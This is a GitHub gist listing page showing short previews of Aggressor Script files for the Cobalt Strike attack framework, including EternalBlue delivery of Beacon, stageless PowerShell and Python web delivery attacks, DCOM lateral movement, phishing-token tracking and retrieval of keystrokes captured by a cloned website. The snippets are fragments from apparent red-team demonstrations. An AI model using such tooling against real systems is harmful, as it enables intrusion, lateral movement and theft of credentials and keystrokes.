Skip to content

Instantly share code, notes, and snippets.

Raphael Mudge rsmudge

Block or report user

Report or block rsmudge

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@rsmudge
rsmudge / initial.cna
Created Feb 20, 2019
How to automate Beacon to execute a sequence of tasks with each checkin...
View initial.cna
#
# Demonstrate how to queue tasks to execute with each checkin...
#
#
# yield tells a function to pause and return a value. The next time the same instance of the
# function is called, it will resume after where it last yielded.
#
sub stuffToDo {
# Tasks for first checkin
@rsmudge
rsmudge / mouse.cna
Created Mar 21, 2018
How to add a popup handler to a Swing component in Aggressor Script/Sleep
View mouse.cna
# demonstrate how to add a popup handler to a Swing component in Sleep
import java.awt.*;
import javax.swing.*;
import javax.swing.event.*;
# safely add a listener to show a popup
sub setupPopupMenu {
# we're using fork({}) to run this in a separate Aggressor Script environment.
@rsmudge
rsmudge / safedelete.cna
Created Sep 1, 2017
Override default file browser popup in Cobalt Strike to prompt user when they try to delete a file.
View safedelete.cna
#
# safe delete in file browser right-click menu
#
popup_clear("filebrowser");
popup filebrowser {
item "&Download" {
local('$file');
foreach $file ($3) {
bdownload($1, "$2 $+ \\ $+ $file");
@rsmudge
rsmudge / eternalblue.cna
Last active May 15, 2019
Script to deliver Cobalt Strike's Beacon payload with the Metasploit Framework's exploit/windows/smb/ms17_010_eternalblue exploit.
View eternalblue.cna
#
# script to help move around with ms17-010 from Metasploit
# Go to Attacks -> Eternal Blue
#
# target, listener, where to save .rc file
sub generate_rc_file {
local('$target $listener $where $handle $shellcode');
($target, $listener, $where) = @_;
@rsmudge
rsmudge / stagelesspython.cna
Created Apr 26, 2017
Stageless Python Web Delivery attack. Kind of fun. I did cheat and use an internal API. :)
View stagelesspython.cna
# Python Stageless Scripted Web Delivery
# setup our stageless Python Web Delivery attack
sub setup_attack {
local('%options $x86payload $x64payload $url $script');
%options = $3;
# generate our stageless x86 payload
artifact_stageless(%options["listener"], "raw", "x86", $null, $this);
yield;
@rsmudge
rsmudge / tokenToEmail.cna
Created Mar 31, 2017
This script demonstrates how to change Cobalt Strike's WEB_HIT and PROFILER_HIT hooks to resolve a phishing token to an email address.
View tokenToEmail.cna
#
# This script overrides WEB_HIT and PROFILER_HIT from default.cna to
# resolve the id var (token) to an email
#
# https://www.cobaltstrike.com/aggressor-script/cobaltstrike.html
#
# method, uri, addr, ua, response, size, handler, when
set WEB_HIT {
local('$out $now $method $uri $addr $ua $response $size $handler $when $params');
@rsmudge
rsmudge / stagelessweb.cna
Last active Mar 27, 2019
A stageless variant of the PowerShell Web Delivery attack. This script demonstrates the new scripting APIs in Cobalt Strike 3.7 (generate stageless artifacts, host content on Cobalt Strike's web server, build dialogs, etc.)
View stagelessweb.cna
# Scripted Web Delivery (Stageless)
#
# This script demonstrates some of the new APIs in Cobalt Strike 3.7.
# setup our stageless PowerShell Web Delivery attack
sub setup_attack {
local('%options $script $url $arch');
%options = $3;
# get the arch right.
@rsmudge
rsmudge / comexec.cna
Created Jan 6, 2017
Lateral Movement with the MMC20.Application COM Object (Aggressor Script Alias)
View comexec.cna
# Lateral Movement alias
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
# register help for our alias
beacon_command_register("com-exec", "lateral movement with DCOM",
"Synopsis: com-exec [target] [listener]\n\n" .
"Run a payload on a target via DCOM MMC20.Application Object");
# here's our alias to collect our arguments
alias com-exec {
View portfwd.cna
#
# port foreward alias in Beacon and SSH
#
# pull common code into a function
sub _portfwd {
if ($2 eq "stop") {
btask($1, "Tasked session to stop forward to $3");
call("beacons.pivot_stop_port", $null, $3);
}
@rsmudge
rsmudge / webkeystrokes.cna
Created Aug 10, 2016
Shows how to pull keystrokes captured by website clone tool from Cobalt Strike's data model. Go to View -> Script Console. Type: load /path/to/webkeystrokes.cna. Then type 'pull'. This will present the information to you.
View webkeystrokes.cna
# convert comma separated keystroke values into a string.
sub toString {
local('@temp');
@temp = split(",", $1);
shift(@temp);
return join("", map({
return chr(parseNumber($1, 16, 10));
}, @temp));
}
You can’t perform that action at this time.